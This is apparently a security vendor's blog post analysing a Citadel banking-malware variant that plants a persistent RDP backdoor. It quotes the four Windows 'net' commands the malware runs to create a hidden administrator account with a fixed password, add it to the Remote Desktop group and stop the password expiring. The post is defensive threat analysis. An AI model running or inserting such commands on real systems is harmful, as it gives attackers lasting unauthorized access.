Using malware to control a malware-infected device is nothing new. In fact, in our article about malware trends in 2014, Trusteer, an IBM Company, Chief Technology Officer Amit Klein specifically points out that malware will again use old-school techniques to overcome security solutions. One of these tools is the ability to remotely take over a device and use it to commit fraud.

Most advanced types of malware have this ability today, including SpyEye’s use of Remote Desktop Protocol (RDP) and Zeus’ and Citadel’s use of Virtual Network Connection (VNC). The security team at Trusteer, an IBM company, has just discovered a Citadel variant that takes this approach a step further, providing enhanced survivability for the attack as well as expanding this malware’s capabilities to perpetrate targeted attacks on enterprises.

The Rise of Remote Control

The use of RDP and VNC protocols to take over devices is widely used by information technology support teams. When users have issues, they can call technical support, and a support engineer can take over the device to solve the problem. Malware authors have added this functionality to their malware to allow the attacker to take over a victim’s device. Attackers who target high-net-worth accounts cannot rely on automated scripts for their attacks since an attack attempting to steal a six- or seven-digit amount has to be carefully and manually conducted.

View on-demand webinar: Cybercriminals Never Sleep

This manual process does have benefits, though. First, this evades some security solutions that specifically search for behavior associated with automatic scripts. Second, it allows the attacker to take over an authenticated session and use HTML injection to ask the victim for additional information (such as one-time passwords) in real time. Third, it allows the attacker to circumvent device ID security systems as the attack is coming from the legitimate user’s device, not from the attacker’s device.

Citadel, a malware based on Zeus, has offered VNC capabilities since its first version. Additionally, Citadel offers the attacker the ability to run Windows shell commands. These commands are handy if the attacker wants to get a clearer picture of the network in which the infected PC resides, scan it and prepare the grounds for something more than just fraud. This type of network mapping is one of the first steps attackers take in targeted enterprise attacks. They gather intelligence, get a clear picture of the target and then strike. This capability was highlighted when Citadel was introduced to the fraudster underground. Citadel’s advertisement stated, “AutoCMD (This is a good feature to have when analyzing a company’s internal structure).” But Citadel is faced with a problem: If the malware is detected and removed by the victim, the VNC capabilities are lost with it. A recent variant analyzed by Trusteer’s security team demonstrated how attackers, who are likely using Citadel to target enterprises, have found a solution to this problem.

How It Works

The new variant uses a simple yet effective trick. After the device is infected, the ability to run Windows shell commands is used for more than just reconnaissance. The variant also executes the following commands:

  1. net user coresystem Lol117755C /add
  2. net localgroup Administrators coresystem /add
  3. net localgroup ‘Remote Desktop Users’ coresystem /add
  4. net accounts /maxpwage:unlimited

These commands do the following:

  1. Add a new Windows local user (username: “coresystem,” password: “Lol117755C”)
  2. Add the new user to the local administrator group
  3. Add the new user to the local RDP group
  4. Set the password to never expire

Why Hackers Use Citadel

Now, even if the Citadel malware is detected and removed, the attacker still has access to the infected machine through the native Windows RDP capabilities. The attacker has set up a backup back door into the infected device. Attackers benefit in the following ways when utilizing such a trick, especially when they are preparing for a persistent, long-term attack against an enterprise:

  • Persistency: Even if Citadel (and its VNC module) are lost, the attacker can still use RDP to access the device.
  • The illusion of safety: A user who was vigilant enough to detect and remove Citadel will now feel safe to use his or her device, thinking it is clean.
  • Flying under the radar: While malware modules (such as VNC) and communications may be more vulnerable to interception and analysis by security software, using the Windows-native RDP capabilities may fly under the radar as some companies actually use this exact same protocol for technical support.

Citadel operators are clearly investing in their attack’s survivability as well as using the malware’s features to target companies, and not even for its original target: financial fraud. Trusteer Rapport (for bank users) and Trusteer Apex (for enterprise users) can detect and prevent Citadel’s infection and its ability to operate with multiple layers of defense that block the threat along with the attack kill chain, preventing the malware from ever infecting the targeted device and running the Windows shell commands. Trusteer’s security team is constantly on the lookout for new and emerging threats and techniques.

more from Malware

Raspberry Robin and Dridex: Two Birds of a Feather

IBM Security Managed Detection and Response (MDR) observations coupled with IBM Security X-Force malware research sheds additional light on the mysterious objectives of the operators behind the Raspberry Robin worm. Based on a comparative analysis between a downloaded Raspberry Robin DLL and a Dridex malware loader, the results show that they are similar in structure and functionality. Thus, IBM Security…

From Ramnit To Bumblebee (via NeverQuest): Similarities and Code Overlap Shed Light On Relationships Between Malware Developers

A comparative analysis performed by IBM Security X-Force uncovered evidence that suggests Bumblebee malware, which first appeared in the wild last year, was likely developed directly from source code associated with the Ramnit banking trojan. This newly discovered connection is particularly interesting as campaign activity has so far linked Bumblebee to affiliates of the threat group ITG23 (aka the Trickbot/Conti…